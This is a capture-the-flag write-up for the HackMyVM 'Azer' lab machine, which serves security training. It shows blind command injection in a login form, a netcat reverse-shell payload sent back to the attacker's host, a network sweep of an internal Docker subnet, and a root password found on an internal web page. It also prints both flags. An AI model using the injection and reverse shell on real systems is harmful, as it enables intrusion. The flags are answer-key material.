HackMyVM Azer
Information Gathering
$ nmap 192.168.100.54 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-01 06:19 EDT
Nmap scan report for 192.168.100.54
Host is up (0.00071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
3000/tcp open ppp
MAC Address: 08:00:27:D6:92:0B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 6.00 seconds
Port 80 serves a web page with no obvious clues.
Port 3000 is a login page.
After trying a few random weak passwords, the response came back.
It looks like the username and password I enter are handed to a script for verification, so we try command injection.
Trying | id
There is no output in the response.
| sleep 5
The response is delayed, so the sleep ran: this is blind command injection.
GetShell
So we go straight for a reverse shell, injecting
nc -c bash 192.168.100.100 9001
and catching it with a listener on the attack box:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.100.100] from (UNKNOWN) [192.168.100.54] 59874
id
uid=1000(azer) gid=1000(azer) groups=1000(azer),100(users)
Getting the User Flag
azer@azer:~$ ls -al
total 64
drwx------ 5 azer azer 4096 Feb 21 2024 .
drwxr-xr-x 3 root root 4096 Feb 21 2024 ..
-rwxr-xr-x 1 azer azer 72 Feb 21 2024 get.sh
drwxr-xr-x 66 azer azer 4096 Feb 21 2024 node_modules
drwxr-xr-x 4 azer azer 4096 Feb 21 2024 .npm
-rw-r--r-- 1 azer azer 53 Feb 21 2024 package.json
-rw-r--r-- 1 azer azer 25336 Feb 21 2024 package-lock.json
-rw-r--r-- 1 azer azer 1950 Feb 21 2024 server.js
drwxr-xr-x 2 azer azer 4096 Feb 21 2024 .ssh
-rw------- 1 azer azer 33 Feb 21 2024 user.txt
azer@azer:~$ cat user.txt
0d2856d69dc348b3af80a0eed67c7502
The user flag is in the home directory.
Root Privilege Escalation
azer@azer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:d6:92:0b brd ff:ff:ff:ff:ff:ff
inet 192.168.100.54/24 brd 192.168.100.255 scope global dynamic enp0s3
valid_lft 5317sec preferred_lft 5317sec
inet6 fe80::a00:27ff:fed6:920b/64 scope link
valid_lft forever preferred_lft forever
3: br-333bcb432cd5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:6c:62:72:35 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.1/24 brd 10.10.10.255 scope global br-333bcb432cd5
valid_lft forever preferred_lft forever
inet6 fe80::42:6cff:fe62:7235/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:2c:c8:ed:3c brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
6: veth8c248f3@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-333bcb432cd5 state UP group default
link/ether 3e:b4:9b:14:67:55 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::3cb4:9bff:fe14:6755/64 scope link
valid_lft forever preferred_lft forever
There is a Docker bridge network here, so we use fscan to look for hosts on it.
azer@azer:~$ ./fscan -np -no -h 10.10.10.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-05-01 08:52:24] [INFO] 暴力破解线程数: 1
[2025-05-01 08:52:25] [INFO] 开始信息扫描
[2025-05-01 08:52:25] [INFO] CIDR范围: 10.10.10.0-10.10.10.255
[2025-05-01 08:52:25] [INFO] 生成IP范围: 10.10.10.0.%!d(string=10.10.10.255) - %!s(MISSING).%!d(MISSING)
[2025-05-01 08:52:25] [INFO] 解析CIDR 10.10.10.1/24 -> IP范围 10.10.10.0-10.10.10.255
[2025-05-01 08:52:25] [INFO] 最终有效主机数量: 256
[2025-05-01 08:52:25] [INFO] 开始主机扫描
[2025-05-01 08:52:25] [INFO] 有效端口数量: 233
[2025-05-01 08:53:01] [SUCCESS] 端口开放 10.10.10.10:80
[2025-05-01 08:53:01] [SUCCESS] 端口开放 10.10.10.1:80
[2025-05-01 08:53:06] [SUCCESS] 服务识别 10.10.10.10:80 => [http]
fscan finds 10.10.10.10:80.
curl returns a strange string; trying it as a password shows it is the root password.
azer@azer:/$ curl 10.10.10.10:80
.:.AzerBulbul.:.
Root Flag
root@azer:~# cat root.txt
b5d96aec2d5f1541c5e7910ccab527d8